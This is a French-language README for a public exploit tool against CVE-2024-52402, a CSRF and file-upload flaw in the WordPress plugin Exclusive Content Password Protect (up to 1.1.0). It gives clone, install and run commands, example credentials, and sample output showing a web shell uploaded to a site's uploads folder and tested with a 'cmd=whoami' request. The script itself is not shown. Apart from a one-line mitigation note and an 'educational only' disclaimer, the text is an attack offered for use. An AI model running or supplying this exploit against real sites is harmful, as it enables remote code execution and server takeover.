
Plugin WordPress Exclusive Content Password Protect <= 1.1.0 - vulnérabilité de type CSRF menant à un téléversement arbitraire de fichiers
Cet exploit cible une vulnérabilité de type Cross-Site Request Forgery (CSRF) dans le plugin WordPress Exclusive Content Password Protect, dans les versions jusqu’à la 1.1.0 incluse. Cette vulnérabilité permet à un attaquant de téléverser un web shell sur le serveur web, conduisant à une éventuelle exécution de code à distance.
Pour exploiter cette vulnérabilité, vous devez fournir l’URL du site WordPress cible, un nom d’utilisateur WordPress valide ainsi que le mot de passe. Le script d’exploitation se connectera au site WordPress et tentera de téléverser un web shell.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
Ce script exploite la vulnérabilité CSRF du plugin Exclusive Content Password Protect pour téléverser un Web Shell sur le serveur WordPress. Cependant, il n’exécute pas une attaque CSRF directement ; il se concentre plutôt sur l’utilisation de la fonctionnalité de téléversement de fichiers du plugin pour parvenir à l’exploitation.
Cloner le dépôt
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
Installer les dépendances
Assurez-vous que la bibliothèque requests est installée :
pip install requests
Exécuter le script Utilisez la commande suivante pour exécuter le script :
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
Pour atténuer cette vulnérabilité, mettez à jour le plugin Exclusive Content Password Protect vers la dernière version où ce problème a été corrigé.
Ce script est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de ce script contre des systèmes pour lesquels vous n’avez pas explicitement l’autorisation de tester est illégale et contraire à l’éthique.
Exploit par : Nxploit , Khaled alenazi.